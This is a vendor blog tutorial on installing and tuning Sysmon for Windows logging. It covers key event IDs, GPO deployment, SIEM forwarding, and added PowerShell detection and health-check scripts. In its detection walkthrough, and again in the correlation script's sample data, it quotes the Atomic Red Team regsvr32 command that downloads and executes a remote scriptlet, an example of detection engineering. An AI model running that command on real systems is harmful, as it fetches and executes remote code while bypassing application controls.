April 29, 2020

    How To Download, Install, and Configure Sysmon for Windows

    In addition to the default built-in logging that Windows Server offers, there are also additional configuration options and software that can be added to increase the visibility of your environment. In addition to enabling Windows Advanced Auditing, System Monitor (Sysmon) is one of the most commonly used add-ons for Windows logging. With Sysmon, you can detect malicious activity by tracking code behavior and network traffic, as well as create detections based on the malicious activity.


    Sysmon is part of the Sysinternals software package, now owned by Microsoft, and enriches the standard Windows logs with higher-level monitoring of events such as process creation, network connections and changes to the file system. It is extremely easy to install and deploy. Following these steps will turn on an incredible amount of logging.


    Downloading and Installing Sysmon

    You can run a Poshim script to automatically install Sysmon, or you can install it manually:

    • To automatically install Sysmon using a Poshim script, follow these instructions.
    • To manually install Sysmon, follow the instructions below.
      1. Download Sysmon (or entire Sysinternals suite)
      2. Download your chosen configuration (we recommend Sysmon Modular)
      3. Save as config.xml in c:\windows, or run the PowerShell command: Invoke-WebRequest -Uri https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/sysmonconfig.xml -OutFile C:\Windows\config.xml
      4. Install by opening a command prompt as administrator and typing sysmon64.exe -accepteula -i c:\windows\config.xml (the switches are plain hyphens, not dashes)
        1. Sysmon.exe is for 32-bit systems only
        2. Sysmon64.exe is for 64-bit systems only

    [Image: Sysmon download page from Microsoft Sysinternals]

    Configuring Sysmon Events to Detect Common Threats

    Sysmon generates several extremely helpful Windows Event IDs that help detect common threats across many different enterprises. A few of the more useful events for security purposes are listed below. The full list of Event IDs that Sysmon can generate is located on its download page.

    If you need to access the Sysmon events locally as opposed to viewing them in a SIEM, you will find them in the event viewer under Applications and Services Logs > Microsoft > Windows > Sysmon.

    Event ID 1 – Process Creation

    Sysmon not only shows which processes are run (Event ID 1); it also shows when they end (Event ID 5), along with a lot of information about the executable or binary itself. It also provides hashes for every binary that runs on the system and lists whether it is signed, making it easy to see if malicious code is attempting to mimic legitimate programs such as PowerShell or other built-in Microsoft tools.

    [Image: Sysmon installation command in Windows command prompt]

    Above, you can see the Registry Editor program being run. Where an allowlist-only environment is not possible, you can use events such as these to alert on which processes are running, whether they are signed by the appropriate vendor, or whether they spawn processes they shouldn't (such as MS Word spawning PowerShell).

    Event ID 3 – Network Connection Detected

    In this example, we can see that Setup.exe has been run, by whom, and that it is reaching out to download additional content from a cloud provider. These events can be useful in detecting command and control traffic (which may indicate that attackers are sending commands to steal data, spread malware, etc.), as well as giving visibility into which applications access particular internet resources.

    [Image: Sysmon configuration XML file example]

    Event ID 4 – Sysmon Service State Changed

    One potential action an attacker or malicious user could take is to disable the Sysmon service if they have the privileges to do so.

    [Image: Sysmon configuration XML file example]

    Event ID 13 – Registry Value Set Events

    Alerts on additions and modifications to certain registry locations can be beneficial for detecting malicious persistence on an endpoint. Entries are often added to the Windows "Run" and "RunOnce" keys so that malware can resume its activities after the host is rebooted.

    [Image: Sysmon event log entries in Windows Event Viewer]

    Event ID 22 – DNS Logging

    There are several benefits to logging DNS traffic, such as finding malicious remote access tools, security misconfigurations and command and control traffic.

    [Image: Sysmon configuration for process creation logging]

    Combining Events for Detection

    Here we can see the popular Red Canary Atomic Red Team test for MITRE ATT&CK T1117 “Regsvr32” across several of the listed event IDs. Basically, regsvr32 can download and register DLLs (dynamic-link libraries) from URLs via the command line, something that is relatively easy to detect with Sysmon installed.

    Event ID 1 shows:

        1. ParentImage – C:\Windows\System32\cmd.exe
          • command prompt
        2. OriginalFileName – REGSVR32.EXE
          • Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including DLLs, on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.
        3. CommandLine – regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
          • Test attack from Atomic Red Team

    [Image: Sysmon network connection monitoring settings]

    Event ID 3 shows:

        1. Image – C:\Windows\System32\regsvr32.exe
          • Regsvr32 is the application creating the network connection
        2. Destination Port Name – https
        3. Destination IP – 151.101.0.133

    [Image: Sysmon file creation event configuration]

    Event ID 22 shows:

        1. Query Name – raw.githubusercontent.com
        2. Image Name – C:\Windows\System32\regsvr32.exe
          • Regsvr32 is the application requesting the DNS resolution of the location of the DLL on the internet

    [Image: Sysmon registry modification detection settings]

    And when you tie them all together, you can create detections based on the malicious activity.
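    One way to tie the three events together, as an added example that is not code from the original post: correlate Event IDs 1, 3 and 22 on ProcessGuid so that regsvr32 launched with /i: pointing at a URL is only reported with high confidence when the same process also resolved a name and connected out. The $events array is constructed sample data flattened to Sysmon's field names; the ProcessGuid values are placeholders, and on a live host you would build the same shape from Get-WinEvent on the Microsoft-Windows-Sysmon/Operational channel.

```powershell
# Added example (not from the original post): correlate Sysmon Event IDs 1, 3 and 22
# by ProcessGuid to flag regsvr32 fetching a scriptlet from a URL (ATT&CK T1117).
# $events is constructed sample data; the {guid-N} values are placeholders.
$events = @(
    [pscustomobject]@{ Id = 1; ProcessGuid = '{guid-1}'; Image = 'C:\Windows\System32\regsvr32.exe'
        ParentImage = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll' }
    [pscustomobject]@{ Id = 22; ProcessGuid = '{guid-1}'; Image = 'C:\Windows\System32\regsvr32.exe'
        QueryName = 'raw.githubusercontent.com' }
    [pscustomobject]@{ Id = 3; ProcessGuid = '{guid-1}'; Image = 'C:\Windows\System32\regsvr32.exe'
        DestinationIp = '151.101.0.133'; DestinationPort = 443 }
    # Benign comparison (constructed): an installer registering a local DLL, no DNS or network events
    [pscustomobject]@{ Id = 1; ProcessGuid = '{guid-2}'; Image = 'C:\Windows\System32\regsvr32.exe'
        ParentImage = 'C:\Windows\System32\msiexec.exe'
        CommandLine = 'regsvr32.exe /s "C:\Program Files\ExampleApp\app.dll"' }
)

function Find-RegSvr32RemoteScriptlet {
    param([Parameter(Mandatory)][object[]]$Events)

    # Stage 1 (Event ID 1): regsvr32 started with /i: pointing at an http(s) URL
    $suspects = $Events | Where-Object {
        $_.Id -eq 1 -and $_.Image -like '*\regsvr32.exe' -and $_.CommandLine -match '/i:\s*https?://'
    }

    foreach ($proc in $suspects) {
        # Stage 2 (Event IDs 22 and 3): did the same ProcessGuid resolve a name and connect out?
        $dns = @($Events | Where-Object { $_.Id -eq 22 -and $_.ProcessGuid -eq $proc.ProcessGuid })
        $net = @($Events | Where-Object { $_.Id -eq 3  -and $_.ProcessGuid -eq $proc.ProcessGuid })

        # Confidence rises as more of the three event types line up for one process
        $confidence = if ($dns.Count -gt 0 -and $net.Count -gt 0) { 'high' }
                      elseif ($dns.Count -gt 0 -or $net.Count -gt 0) { 'medium' }
                      else { 'low' }

        [pscustomobject]@{
            ProcessGuid  = $proc.ProcessGuid
            ParentImage  = $proc.ParentImage
            CommandLine  = $proc.CommandLine
            DnsQueries   = ($dns | ForEach-Object QueryName) -join ', '
            Destinations = ($net | ForEach-Object { "$($_.DestinationIp):$($_.DestinationPort)" }) -join ', '
            Confidence   = $confidence
        }
    }
}

# Only {guid-1} is reported, with Confidence 'high'; the local registration is not matched at all
Find-RegSvr32RemoteScriptlet -Events $events | Format-List
```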

    [Image: Sysmon event log showing captured security events]

    Learn more about getting the most out of your Windows logging tools in “How to Optimize Windows Logging for Security,” and see how Blumira’s platform automatically detects and remediates security findings.

    Sending Sysmon Events to Blumira

    Once Sysmon is configured, you will need to add the Sysmon event channel to your NXLog configuration in order to start sending logs to Blumira’s platform for detection and response. You can use our latest version of Flowmira, or add the Sysmon route to your existing config. The latest version of Flowmira can be found here: https://github.com/Blumira/Flowmira/blob/master/nxlog.conf

    Download Your Guide to Microsoft Security

    To help organizations running Microsoft environments, our guide gives you practical, step-by-step Windows tips to significantly improve your visibility into malicious activity.


    In this guide, you’ll learn:

        • How to use built-in Windows tools like System Monitor for advanced visibility into Windows server logs
        • How to configure Group Policy Objects (GPOs) to give you a deeper look into your Windows environment
        • Free, pre-configured tools from Blumira you can use to easily automate Windows logging to enhance detection & response
        • What indicators of security threats you should be able to detect for Microsoft Azure and Office 365


    Frequently Asked Questions

    What Sysmon configuration should I start with?

    Use SwiftOnSecurity's sysmon-config (available on GitHub) as your starting baseline. It filters out high-volume noise from trusted Windows processes while capturing the events that matter most for threat detection: process creation with full command lines, network connections to external IPs, file writes to sensitive directories, and registry modifications. Do not run Sysmon with a blank configuration, because it will log everything and overwhelm your event log within hours. After deploying the SwiftOnSecurity config, run it for a week and review what is generating the most volume. Tune out any legitimate applications that create excessive noise in your specific environment. Olaf Hartong's sysmon-modular is another good option if you want a config broken into individual detection modules that you can enable or disable independently.

    Which Sysmon event IDs are most important for threat detection?

    Focus on these six event IDs first. Event 1 (Process Creation) is the highest-value event because it captures the full command line, parent process, and user context for every new process, which is essential for detecting malicious PowerShell, LOLBins abuse, and suspicious executables. Event 3 (Network Connection) reveals outbound connections with destination IPs and ports, catching C2 callbacks. Event 7 (Image Loaded) detects DLL sideloading when attackers place malicious DLLs in application directories. Event 10 (Process Access) catches credential dumping tools accessing LSASS memory. Event 11 (File Create) logs new files written to disk, including malware drops and tools staged by attackers. Event 13 (Registry Value Set) catches persistence mechanisms like new Run keys or service registrations.

    How do I deploy Sysmon across all domain machines using Group Policy?

    Create a GPO with a startup script that handles installation and updates. Store the Sysmon installer (sysmon64.exe) and your configuration file (sysmonconfig.xml) on a SYSVOL share or another network share accessible to all domain computers. The startup script should check if Sysmon is already installed (sc query Sysmon64), install it if missing (sysmon64.exe -accepteula -i \\server\share\sysmonconfig.xml), and update the config if the version has changed (sysmon64.exe -c \\server\share\sysmonconfig.xml). Link the GPO to your target OUs. Test on a pilot OU first. The script runs at machine boot, so machines pick up the installation or config update on their next restart.
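    A startup script that follows these steps, and also covers the manual install commands from earlier in the post, as an added example rather than Blumira's or Microsoft's own script: it checks for the Sysmon64 service, installs from the share if it is missing, and otherwise pushes the config only when the shared file differs from a locally cached copy. The share path, the local cache directory and the log file are assumptions; adjust them to your SYSVOL layout.

```powershell
# Added example (not Blumira's or Microsoft's script): idempotent Sysmon GPO startup script.
# Assumed paths: $Share holds sysmon64.exe and sysmonconfig.xml; $LocalDir caches the last
# applied config so a changed file on the share triggers "sysmon64.exe -c".
$Share     = '\\server\share\sysmon'
$Installer = Join-Path $Share 'sysmon64.exe'
$SharedCfg = Join-Path $Share 'sysmonconfig.xml'
$LocalDir  = 'C:\ProgramData\SysmonDeploy'
$LocalCfg  = Join-Path $LocalDir 'sysmonconfig.xml'
$LogFile   = Join-Path $LocalDir 'deploy.log'

function Write-DeployLog([string]$Message) {
    Add-Content -Path $LogFile -Value ("{0:u} {1}" -f (Get-Date), $Message)
}

function Test-SysmonInstalled {
    # PowerShell form of the "sc query Sysmon64" check from the text
    return [bool](Get-Service -Name Sysmon64 -ErrorAction SilentlyContinue)
}

function Test-ConfigChanged {
    # Compare SHA256 of the shared config with the copy applied on the last run
    if (-not (Test-Path $LocalCfg)) { return $true }
    $shared = (Get-FileHash -Path $SharedCfg -Algorithm SHA256).Hash
    $local  = (Get-FileHash -Path $LocalCfg  -Algorithm SHA256).Hash
    return ($shared -ne $local)
}

New-Item -ItemType Directory -Path $LocalDir -Force | Out-Null

if (-not (Test-Path $Installer) -or -not (Test-Path $SharedCfg)) {
    Write-DeployLog "Share unreachable or files missing; nothing done"
    exit 0
}

if (-not (Test-SysmonInstalled)) {
    # Fresh install: the same command as the manual step, pointing at the shared config
    & $Installer -accepteula -i $SharedCfg | Out-Null
    Write-DeployLog "Installed Sysmon, exit code $LASTEXITCODE"
    if ($LASTEXITCODE -eq 0) { Copy-Item $SharedCfg $LocalCfg -Force }
}
elseif (Test-ConfigChanged) {
    # Already installed: load the new config without reinstalling the driver
    & $Installer -c $SharedCfg | Out-Null
    Write-DeployLog "Updated Sysmon config, exit code $LASTEXITCODE"
    if ($LASTEXITCODE -eq 0) { Copy-Item $SharedCfg $LocalCfg -Force }
}
else {
    Write-DeployLog "Sysmon present and config unchanged"
}
```

    Because the local copy is only refreshed after a successful install or update, a failed push is retried at the next boot.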

    Does Sysmon slow down Windows machines?

    With a properly tuned configuration, the performance impact is minimal on most workstations and servers. The SwiftOnSecurity config is specifically designed to exclude high-volume, low-value events. Performance problems come from overly broad configurations that log every DLL load (Event 7 without exclusions), every network connection (Event 3 without filtering), or every file creation (Event 11 globally). If you see performance degradation, check Sysmon Event 255, which logs when Sysmon itself encounters errors or drops events due to processing delays. Also monitor the size of the Sysmon event log channel. If it is growing faster than a few hundred MB per day on a workstation, your config needs tighter filtering.

    How do I forward Sysmon events to a SIEM?

    The most common methods are Windows Event Forwarding (WEF), which uses the built-in Windows event subscription mechanism to push events to a collector server, and log shipping agents like NXLog, Winlogbeat, or the Elastic Agent. For WEF, create a subscription on your collector that pulls events from the Microsoft-Windows-Sysmon/Operational channel on source machines. For agent-based collection, configure the agent to read that same channel and forward events to your SIEM endpoint. Blumira can ingest Sysmon events through its Windows agent and applies pre-built detection rules that map Sysmon event data to known attack patterns, so you get actionable alerts without writing custom correlation rules from scratch. Whichever method you choose, verify that events are flowing by checking your SIEM for recent Event ID 1 entries from test machines.
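    A quick health check that covers the tuning advice and the verification step above, as an added example not taken from the original post: it reports the Sysmon channel size, the per-Event-ID volume over a window, any Event 255 errors, and the most recent Event ID 1. It assumes it runs locally on a host with Sysmon installed and read access to the channel; the default 24-hour window is an assumption.

```powershell
# Added example (not from the original post): Sysmon channel health and volume check.
# Run locally on a monitored host; $Hours is an assumed reporting window.
param([int]$Hours = 24)

$Channel = 'Microsoft-Windows-Sysmon/Operational'
$Since   = (Get-Date).AddHours(-$Hours)

# Channel size and record count: sustained growth of hundreds of MB/day on a
# workstation is the signal in the text that the config needs tighter filtering
$log = Get-WinEvent -ListLog $Channel
[pscustomobject]@{
    LogSizeMB   = [math]::Round($log.FileSize / 1MB, 1)
    MaxSizeMB   = [math]::Round($log.MaximumSizeInBytes / 1MB, 1)
    RecordCount = $log.RecordCount
} | Format-List

# Volume per Event ID in the window: the noisiest IDs are the ones to tune first
$events = @(Get-WinEvent -FilterHashtable @{ LogName = $Channel; StartTime = $Since } -ErrorAction SilentlyContinue)
$events | Group-Object Id | Sort-Object Count -Descending |
    Select-Object @{ n = 'EventId'; e = { $_.Name } }, Count |
    Format-Table -AutoSize

# Event 255 is Sysmon's own error event; any hits point at config problems or dropped events
$errors = @($events | Where-Object Id -eq 255)
if ($errors.Count -gt 0) {
    Write-Warning "$($errors.Count) Sysmon error (ID 255) events since $Since"
    $errors | Select-Object -First 5 TimeCreated, Message | Format-List
}

# Sanity check from the text: a recent Event ID 1 proves the channel is live
$latest = $events | Where-Object Id -eq 1 | Sort-Object TimeCreated -Descending | Select-Object -First 1
if ($latest) { "Most recent process creation event: $($latest.TimeCreated)" }
else { Write-Warning "No Event ID 1 in the last $Hours hours; check the service and the config" }
```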

    Amanda Berlin

    Amanda Berlin is the Senior Product Manager of Cybersecurity at Blumira, bringing nearly two decades of experience to her position. At Blumira she leads a team of incident detection engineers who are responsible for creating new detections based on threat intelligence and research for the Blumira platform. An...
